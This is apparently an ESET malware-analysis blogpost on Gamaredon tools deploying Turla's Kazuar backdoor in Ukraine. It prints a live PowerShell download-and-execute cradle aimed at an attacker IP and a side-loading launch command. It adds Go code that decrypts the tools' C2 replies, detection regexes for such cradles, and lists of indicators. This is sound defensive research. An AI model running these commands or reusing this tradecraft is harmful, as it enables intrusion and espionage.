Gamaredon X Turla collab


In this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine.

Key points of this blogpost:

  • In February 2025, we found that the Gamaredon tool PteroGraphin was used to restart Turla’s Kazuar backdoor on a machine in Ukraine.
  • In April and June 2025, we detected that Kazuar v2 was deployed using the Gamaredon tools PteroOdd and PteroPaste.
  • These findings lead us to believe with high confidence that Gamaredon is collaborating with Turla.
  • Turla’s victim count is very low compared with the number of Gamaredon compromises, suggesting that Turla selects the most valuable machines.
  • Both groups are affiliated with the FSB, Russia’s main domestic intelligence and security agency.

Threat actor profiles

Gamaredon

Gamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian governmental institutions, as evidenced over the years in several reports from CERT-UA and from other official Ukrainian bodies. Gamaredon has been attributed by the Security Service of Ukraine (SSU) to Center 18 of Information Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with another threat actor that we discovered and named InvisiMole.

Turla

Turla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly extending back into the late 1990s. It is believed to be part of the FSB. It primarily focuses on high-profile targets, such as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having breached major organizations such as the US Department of Defense in 2008 and the Swiss defense company RUAG in 2014. Over the past few years, we have documented a large part of Turla’s arsenal on the WeLiveSecurity blog and in private reports.

Overview

In February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine. On these machines, Gamaredon deployed a variety of tools, including PteroLNK, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, while Turla only deployed Kazuar v3.

On one of those machines, we were able to capture a payload showing that Turla is able to issue commands via Gamaredon implants. PteroGraphin was used to restart Kazuar, probably after Kazuar crashed or was not launched automatically. Thus, PteroGraphin was most likely used as a recovery method by Turla. This is the first time that we have been able to link these two groups together via technical indicators (see First chain: Restart of Kazuar v3).

Because, in all four cases, the ESET endpoint product was installed after the compromises, we are unable to pinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious LNK files on removable drives (as explained in our recent blogpost), so we presume that one of these is the most likely compromise vector.

In April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see Second chain: Deployment of Kazuar v2 via PteroOdd and Third chain: Deployment of Kazuar v2 via PteroPaste). This shows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.

Victimology

Over the past 18 months, we have detected Turla on seven machines in Ukraine. We believe that Gamaredon compromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. In all cases, the ESET endpoint product was only installed after both compromises.

It is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February 2024.

All these elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest that Turla is only interested in specific machines, probably ones containing highly sensitive intelligence.

Attribution

Gamaredon

In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to Gamaredon.

Turla

Similarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that group.

Gamaredon-Turla collaboration hypotheses

In 2020, we showed that Gamaredon provided access to InvisiMole (see our white paper), so it is not the first time that Gamaredon has collaborated with another Russia-aligned threat actor.

On the other hand, Turla is known for hijacking other threat actors’ infrastructure to get an initial foothold in its targets’ networks. Over the past years, several cases have been publicly documented:

  • In 2019, Symantec published a blogpost showing that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Middle Eastern target.
  • In 2023, Mandiant published a blogpost showing that Turla reregistered expired Andromeda C&C domains in order to compromise targets in Ukraine.
  • In 2024, Microsoft published two blogposts (first and second) showing that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in order to deploy Kazuar.

Note that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). Gamaredon is believed to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea (see this report from the Security Service of Ukraine), which is part of the FSB’s counterintelligence service. As for Turla, the UK’s NCSC attributes the group to Center 16 of the FSB, which is Russia’s main signals intelligence (SIGINT) agency.

Therefore, we propose three hypotheses to explain our observations:

  • Very likely: Given that both groups are part of the Russian FSB (though in two different Centers), Gamaredon provided access to Turla operators so that they could issue commands on a specific machine to restart Kazuar, and deploy Kazuar v2 on some others.
  • Unlikely: Turla compromised Gamaredon infrastructure and leveraged this access to regain access to a machine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C&C pages, this possibility cannot be totally discarded. However, it implies that Turla was able to reproduce the full Gamaredon chain.
  • Unlikely: Gamaredon has access to Kazuar and deploys it on very specific machines. Given Gamaredon’s noisy approach, we don’t think it would be that careful deploying Kazuar on only a very limited set of victims.

Geopolitical context

From an organizational perspective, it is worth noting that the two entities commonly associated with Turla and Gamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.

The FSB’s Center 16 (which is believed to harbor Turla) is a direct heir to the KGB’s 16th Directorate, which was primarily responsible for foreign SIGINT collection – the persistence of the number 16 is in fact regarded by observers as a sign of the FSB leadership’s desire to emphasize a historical lineage. Center 18 (which is usually associated with Gamaredon) maintains a rough affiliation with the KGB’s 2nd Chief Directorate, which was responsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently worked hand in hand, sharing responsibilities for monitoring foreign embassies on Russian soil, for example.

Then and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity between internal security and national defense. Although Center 16 is still tasked with foreign intelligence collection and Center 18 is theoretically part of the FSB’s counterintelligence apparatus, both entities seem to maintain some mission overlaps – especially with regard to former Soviet republics. In 2018, the Security Service of Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting a joint cyberespionage campaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has probably reinforced this convergence, with ESET data clearly showing Gamaredon and Turla activities focusing on the Ukrainian defense sector in recent months.

Although the Russian intelligence community is known for its fierce internal rivalries, there are indications that such tensions mainly apply to interservice relations rather than to intra-agency interactions. In this context, it is perhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating to some extent.

First chain: Restart of Kazuar v3

In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. In this section we detail the exact chain that we detected.

Timeline

The overall timeline for this machine is as follows:

Hereafter, we assume these dates to be unaltered.

Details of the events

Since January 20th, 2025, PteroGraphin (see Figure 1) was present on the machine at %APPDATA%\x86.ps1. It is a downloader that provides an encrypted channel for delivering payloads via Telegra.ph, a web service operated by Telegram that enables easy creation of web pages. Note that PteroGraphin contains a token to edit the Telegra.ph page, so anyone with knowledge of this token (Turla, for example, though unlikely) could manipulate the contents.

Figure 1. PteroGraphin (token partially redacted)

On February 27th, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from https://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.

Figure 2. Beautified JSON reply

The data in children can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above, which gives:

powershell -windowStyle hidden -EncodedCommand <base64-encoded_payload>

The decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.
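To make that decryption step concrete, here is an added example (not ESET's code, and not the PteroGraphin script itself) in Go that parses a Telegra.ph getPage reply of the shape shown in Figure 2, concatenates the text nodes under children, base64-decodes the result, decrypts it with 3DES, and then unpacks the -EncodedCommand argument (base64 of UTF-16LE text) to recover the inner script. The key and IV are placeholders constructed for the example, CBC mode with PKCS#7 padding is an assumption (the .NET TripleDES default), and the sample reply is built inline by the code itself rather than taken from the real page.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"encoding/json"
	"errors"
	"strings"
	"unicode/utf16"
)

// Placeholder 3DES key (24 bytes) and IV (8 bytes); the real script's values are not reproduced.
var fixtureKey, fixtureIV = []byte("0123456789abcdef01234567"), []byte("abcdefgh")

// SampleInnerScript is the constructed, inert script carried in -EncodedCommand.
const SampleInnerScript = "Write-Output 'stage2 placeholder'"

// collectText walks the Telegra.ph node tree (strings or {tag, children} objects) in order.
func collectText(nodes []interface{}, sb *strings.Builder) {
	for _, n := range nodes {
		switch v := n.(type) {
		case string:
			sb.WriteString(v)
		case map[string]interface{}:
			if kids, ok := v["children"].([]interface{}); ok {
				collectText(kids, sb)
			}
		}
	}
}

// decrypt3DESCBC assumes CBC mode with PKCS#7 padding (the .NET TripleDES default).
func decrypt3DESCBC(key, iv, ct []byte) ([]byte, error) {
	block, err := des.NewTripleDESCipher(key)
	if err != nil { return nil, err }
	if len(ct) == 0 || len(ct)%des.BlockSize != 0 { return nil, errors.New("ciphertext is not block aligned") }
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	n := int(pt[len(pt)-1]) // PKCS#7: the last byte is the pad length and every pad byte equals it
	if n == 0 || n > des.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#7 padding")
	}
	return pt[:len(pt)-n], nil
}

// decodeEncodedCommand reverses PowerShell's -EncodedCommand (base64 of UTF-16LE text).
func decodeEncodedCommand(b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil || len(raw)%2 != 0 {
		return "", errors.New("argument is not base64-encoded UTF-16LE")
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	return string(utf16.Decode(u)), nil
}

// DecodeReply parses the getPage JSON, decrypts the page text and returns the outer
// command line plus the script hidden in its -EncodedCommand argument.
func DecodeReply(replyJSON, key, iv []byte) (outer, inner string, err error) {
	var r map[string]interface{}
	if err = json.Unmarshal(replyJSON, &r); err != nil || r["ok"] != true {
		return "", "", errors.New("malformed or not-ok getPage reply")
	}
	res, _ := r["result"].(map[string]interface{})
	content, _ := res["content"].([]interface{})
	var sb strings.Builder
	collectText(content, &sb)
	ct, err := base64.StdEncoding.DecodeString(strings.TrimSpace(sb.String()))
	if err != nil { return "", "", err }
	pt, err := decrypt3DESCBC(key, iv, ct)
	if err != nil { return "", "", err }
	outer = string(pt)
	args := strings.Fields(outer)
	for i, tok := range args { // PowerShell parameter names are case-insensitive
		if strings.EqualFold(tok, "-EncodedCommand") && i+1 < len(args) {
			inner, err = decodeEncodedCommand(args[i+1])
			return outer, inner, err
		}
	}
	return outer, "", errors.New("no -EncodedCommand argument")
}

// SampleReply builds a constructed reply in the API's shape, with the page text holding
// base64(3DES-CBC(outer command)) under the fixture key, as the script expects.
func SampleReply() []byte {
	u := utf16.Encode([]rune(SampleInnerScript))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	outer := "powershell -windowStyle hidden -EncodedCommand " + base64.StdEncoding.EncodeToString(raw)
	block, _ := des.NewTripleDESCipher(fixtureKey)
	pad := des.BlockSize - len(outer)%des.BlockSize
	padded := append([]byte(outer), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, fixtureIV).CryptBlocks(ct, padded)
	return []byte(`{"ok":true,"result":{"path":"example-page-01-20","content":[{"tag":"p","children":["` + base64.StdEncoding.EncodeToString(ct) + `"]}]}}`)
}
```

Calling DecodeReply(SampleReply(), fixtureKey, fixtureIV) yields the outer powershell command line and the inner script; against a real capture, swap in the key and IV read from the script and feed the raw getPage body. The padding check matters in practice: a wrong key produces garbage whose last byte rarely forms valid PKCS#7, so the error surfaces immediately rather than as an unreadable "command".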

Figure 3. PteroOdd

On February 27th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the reply is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.

Figure 4. PteroOdd JSON reply (beautified and partially redacted)

The decoded command is shown in Figure 5.

Figure 5. Decoded PowerShell command (username redacted)

The payload first uploads the victim’s computer name and system drive’s volume serial number to the Cloudflare worker subdomain https://lucky-king-96d6.mopig92456.workers[.]dev.

What is most interesting is the last line:

Start-Process -FilePath "C:\Users\[redacted]\AppData\Local\Programs\Sony\AudioDrivers\vncutil64.exe"

This is the path to the application that is run to execute Kazuar by side-loading it. The ESET endpoint product detected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in memory and loaded from this process. It is not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar somehow stopped working after the ESET product installation and that they needed to restart the implant. Note that we didn’t see Gamaredon downloading Kazuar; it was present on the system since February 11th, 2025, before the ESET product was installed.

Then, on February 28th, 2025 at 15:17:14 UTC, we detected another similar PowerShell script, shown in Figure 6.

Figure 6. Second PowerShell command executing Kazuar

The first lines and the Cloudflare worker subdomain are identical. It starts the same vncutil64.exe but also a second executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar loader. We then detected in memory, in the LaunchGFExperience.exe process, another KERNEL Kazuar v3 payload (agent_label is AGN-XX-01). It is not clear why two different KERNEL Kazuar v3 payloads were present on the same machine.

Finally, an HTTP POST request, with the list of running processes, was sent to https://eset.ydns[.]eu/submit.php. The Turla operators most likely wanted confirmation that Kazuar was successfully launched.

On March 10th, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C&C URL https://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This sample was detected on a different machine in Ukraine, on which Kazuar was also present.

The decoded payload is shown in Figure 7 and shows that it also uses eset.ydns[.]eu, while not interacting with any Turla sample.

On the other hand, we noted that the downloaded payload uploads the following pieces of information to https://eset.ydns[.]eu/submit.php:

However, we are not aware of any .NET application that is currently being used by Gamaredon, while there are several of them used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla, and we assess with medium confidence that the domain eset.ydns[.]eu is controlled by Turla.

Figure 7. PteroOdd sample

The additional base64-encoded PowerShell command is a new downloader that abuses api.gofile[.]io; we named it PteroEffigy.

Kazuar v3

Kazuar v3 is the latest branch of the Kazuar family, itself a sophisticated C# espionage implant that we believe has been used exclusively by Turla since it was first seen in 2016. Kazuar v2 and v3 are essentially the same malware family and share the same codebase. However, some major changes have been introduced.

Kazuar v3 contains around 35% more C# lines than Kazuar v2 and introduces additional network transport methods: over web sockets and Exchange Web Services. Kazuar v3 can have one of three roles (KERNEL, BRIDGE, or WORKER), and malware functionalities are divided among these roles. For example, only BRIDGE communicates with the C&C server.

Second chain: Deployment of Kazuar v2 via PteroOdd

On one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise chain on April 18th, 2025.

On April 18th, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload from https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, shown in Figure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script, which is the PowerShell downloader PteroEffigy.

Figure 8. Payload downloaded by PteroOdd

This PowerShell payload downloads another payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.

scrss.ps1 turned out to be an installer for Turla’s Kazuar v2, which was previously analyzed in detail by Unit42. This shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.

The Kazuar agent_label is AGN-AB-26 and the three C&C servers are:

  • https://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php
  • https://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php
  • https://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php

It is worth noting that Turla keeps using compromised WordPress servers as C&Cs for Kazuar.

Interestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. For example, the latest updates to the backdoor commands in Kazuar v3 are also included in this AGN-AB-26 version.

Third chain: Deployment of Kazuar v2 via PteroPaste

On June 5th and 6th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In both cases, Gamaredon’s PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.

Figure 9. PowerShell script executed by PteroPaste

The base64-encoded string is the following downloader in PowerShell:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');

The downloaded script ekrn.ps1 is very similar to scrss.ps1 mentioned in the second chain. This also drops and installs Kazuar v2.

Both samples have an agent_label of AGN-AB-27 and the C&C servers are the same as those in the sample from the second chain:

ekrn.exe is a legitimate process of ESET endpoint security products. Thus, Turla probably tried to masquerade as it in order to fly under the radar. Also note that ekrn.ydns[.]eu resolves to 91.231.182[.]187.

Finally, we also found on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5th, 2025. This suggests that Turla is interested in targets outside of Ukraine as well.
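The launch command in Figure 5 and the PteroPaste downloader above share traits that endpoint telemetry can flag without any signature for the payload itself: a hidden-window PowerShell with an encoded command, certificate validation switched off ahead of a download, an IEX download cradle, a process listing followed by an HTTP upload, and Start-Process on a binary under %LOCALAPPDATA%\Programs. The following Go program is an added example, not ESET's detection logic, that runs such rules over constructed process-creation and script-block records; the event IDs, rule names, documentation-range IP address and username are all this example's own, and the patterns are deliberately conservative so that a benign script produces no hit.

```go
package main

import (
	"fmt"
	"regexp"
)

// Event is a constructed, simplified telemetry record: ID 1 stands for a
// process-creation event (command line), ID 4104 for a PowerShell script-block
// log entry (script text as the engine saw it, already decoded).
type Event struct {
	ID   int
	Text string
}

// Finding ties a matched rule to the index of the event that triggered it.
type Finding struct {
	EventIndex int
	Rule       string
}

// rule fires only when every one of its patterns matches the event text.
type rule struct {
	name string
	all  []*regexp.Regexp
}

func pats(exprs ...string) []*regexp.Regexp {
	out := make([]*regexp.Regexp, 0, len(exprs))
	for _, e := range exprs {
		out = append(out, regexp.MustCompile(e))
	}
	return out
}

// Rules derived from the behaviours described in the text; the patterns are this
// example's own choices, not ESET's detections.
var rules = []rule{
	// PteroPaste downloader: TLS certificate validation disabled before the download.
	{"tls-validation-disabled", pats(`(?i)ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}`)},
	// Download-and-execute cradle.
	{"download-cradle", pats(`(?i)\b(iex|invoke-expression)\b`, `(?i)downloadstring|downloadfile`)},
	// Outer command produced by PteroGraphin: hidden window plus an encoded payload.
	{"hidden-encoded-powershell", pats(`(?i)-w(indowstyle)?\s+hidden`, `(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}`)},
	// Start-Process on a binary under the user profile, the side-loading launch from Figure 5.
	{"user-profile-binary-launch", pats(`(?i)start-process\b[^\n]*\\AppData\\Local\\Programs\\`)},
	// Process enumeration followed by an HTTP upload within the same script.
	{"process-list-to-web", pats(`(?i)\bget-process\b`, `(?i)uploadstring|invoke-restmethod|invoke-webrequest`)},
}

func (r rule) matches(text string) bool {
	for _, re := range r.all {
		if !re.MatchString(text) {
			return false
		}
	}
	return true
}

// Scan evaluates every rule against every event and returns all hits in order.
func Scan(events []Event) []Finding {
	var out []Finding
	for i, ev := range events {
		for _, r := range rules {
			if r.matches(ev.Text) {
				out = append(out, Finding{EventIndex: i, Rule: r.name})
			}
		}
	}
	return out
}

// SampleEvents are constructed records modelled on the scripts described in the text;
// the URL uses a documentation-range address and the username is invented.
var SampleEvents = []Event{
	{4104, `[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https://203.0.113.10/ekrn.ps1');`},
	{1, `powershell -windowStyle hidden -EncodedCommand QQBCAEMA`},
	{4104, `$p = Get-Process | Select-Object Name; (New-Object Net.WebClient).UploadString('https://203.0.113.10/submit.php', ($p | Out-String)); Start-Process -FilePath "C:\Users\user01\AppData\Local\Programs\Sony\AudioDrivers\vncutil64.exe"`},
	{4104, `Get-ChildItem -Path $env:TEMP -Recurse | Measure-Object`},
}

func main() {
	for _, f := range Scan(SampleEvents) {
		fmt.Printf("event %d (ID %d): %s\n", f.EventIndex, SampleEvents[f.EventIndex].ID, f.Rule)
	}
}
```

Script-block logging (event 4104) is what makes the third record detectable at all: the process-creation line for that activity would only show an encoded blob, while the decoded script exposes both the process listing and the Start-Process path. Rules that need two conditions in one script (such as Get-Process plus an upload) keep the false-positive rate down compared with matching either alone.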

Conclusion

In this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. We now believe with high confidence that both groups – separately associated with the FSB – are cooperating and that Gamaredon is providing initial access to Turla.

For any inquiries about our research published on WeLiveSecurity, please contact us at threatintel@eset.com
ESET Research offers private APT intelligence reports and data feeds. For any inquiries about this service, visit the ESET Threat Intelligence page.

IoCs

A comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.

Files

| SHA-1 | Filename | Detection | Description |
|---|---|---|---|
| 7DB790F75829D3E6207D8EC1CBCD3C133F596D67 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 2610A899FE73B8F018D19B50BE55D66A6C78B2AF | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| 3A24520566BBE2E262A2911E38FD8130469BA830 | N/A | PowerShell/Pterodo.QB | PteroOdd. |
| DA7D5B9AB578EF6487473180B975A4B2701FDA9E | scrss.ps1 | PowerShell/Turla.AI | Kazuar v2 installer. |
| D7DF1325F66E029F4B77E211A238AA060D7217ED | N/A | MSIL/Turla.N.gen | Kazuar v2. |
| FF741330CC8D9624D791DE9074086BBFB0E257DC | N/A | PowerShell/TrojanDownloader.Agent.DV | PowerShell downloader executed by PteroPaste. |
| A7ACEE41D66B537D900403F0E6A26AB6A1290A32 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 54F2245E0D3ADEC566E4D822274623BF835E170C | N/A | MSIL/Agent_AGen.CZQ | Kazuar v2. |
| 371AB9EB2A3DA44099B2B7716DE0916600450CFD | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer. |
| 4A58365EB8F928EC3CD62FF59E59645C2D8C0BA5 | N/A | MSIL/Turla.W | Kazuar v2. |
| 214DC22FA25314F9C0DDA54F669EDE72000C85A4 | Sandboxie.vbs | VBS/Turla.C | Kazuar v2 installer – VBScript variant. |

Network

| IP | Domain | Hosting provider | First seen | Details |
|---|---|---|---|---|
| N/A | lucky-king-96d6.mopig92456.workers[.]dev | N/A | 2025-02-28 | Cloudflare worker found in payloads downloaded by PteroOdd. |
| 64.176.173[.]164 | eset.ydns[.]eu | The Constant Company, LLC | 2025-03-01 | C&C server found in payloads downloaded by PteroOdd. |
| 85.13.145[.]231 | hauptschule-schwalbenstrasse[.]de | Neue Medien Muennich GmbH | 2024-06-06 | Compromised WordPress site used as Kazuar C&C. |
| 91.231.182[.]187 | ekrn.ydns[.]eu | South Park Networks LLC | 2025-06-05 | C&C server in payloads downloaded by PteroPaste. |
| 185.118.115[.]15 | fjsconsultoria[.]com | Dream Fusion – IT Services, Lda | 2024-06-26 | Compromised WordPress site used as Kazuar C&C. |
| 77.46.148[.]242 | ingas[.]rs | TELEKOM SRBIJA a.d. | 2024-06-03 | Compromised WordPress site used as Kazuar C&C. |
| 168.119.152[.]19 | abrargeospatial[.]ir | Hetzner Online GmbH | 2023-11-13 | Compromised WordPress site used as Kazuar C&C. |
| 217.160.0[.]33 | www.brannenburger-nagelfluh[.]de | IONOS SE | 2019-06-06 | Compromised WordPress site used as Kazuar C&C. |
| 217.160.0[.]159 | www.pizzeria-mercy[.]de | IONOS SE | 2023-10-05 | Compromised WordPress site used as Kazuar C&C. |

MITRE ATT&CK techniques

This table was built using version 17 of the MITRE ATT&CK framework.

| Tactic | ID | Name | Description |
|---|---|---|---|
| Resource Development | T1583.001 | Acquire Infrastructure: Domains | Gamaredon or Turla registered a domain at a free dynamic DNS provider. |
| | T1583.004 | Acquire Infrastructure: Server | Gamaredon or Turla rented a server at Vultr. |
| | T1583.007 | Acquire Infrastructure: Serverless | Gamaredon created Cloudflare workers and Telegra.ph pages. |
| | T1584.003 | Compromise Infrastructure: Virtual Private Server | Turla compromised WordPress websites. |
| | T1608 | Stage Capabilities | Turla staged Kazuar installer scripts on its C&C servers. |
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | PteroGraphin is developed in PowerShell. |
| Persistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Kazuar loaders use DLL side-loading. |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted via substitution tables. |
| | T1480.001 | Execution Guardrails: Environmental Keying | Kazuar loaders decrypt the payloads using the machine name as the key. |
| | T1036.005 | Masquerading: Match Legitimate Name or Location | Kazuar loaders are placed in legitimate-looking directories such as C:\Program Files (x86)\Brother PrinterApp or %LOCALAPPDATA%\Programs\Sony\AudioDrivers. |
| Discovery | T1057 | Process Discovery | The PowerShell script starting Kazuar v3 sends the list of running processes to its C&C server. |
| | T1012 | Query Registry | The PowerShell script starting Kazuar v3 gets the PowerShell version from the registry. |
| | T1082 | System Information Discovery | The PowerShell script starting Kazuar v3 exfiltrates the last boot time, OS version, and OS architecture. |
| | T1083 | File and Directory Discovery | The PowerShell script starting Kazuar v3 lists files in the directories %TEMP% and %APPDATA%\Microsoft\Windows. |
| Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | PteroGraphin and Kazuar use HTTPS. |
| | T1573.001 | Encrypted Channel: Symmetric Cryptography | PteroGraphin decrypts the C&C reply using 3DES. |
| | T1102 | Web Service | Legitimate web services, such as Telegra.ph, were used in this campaign. |
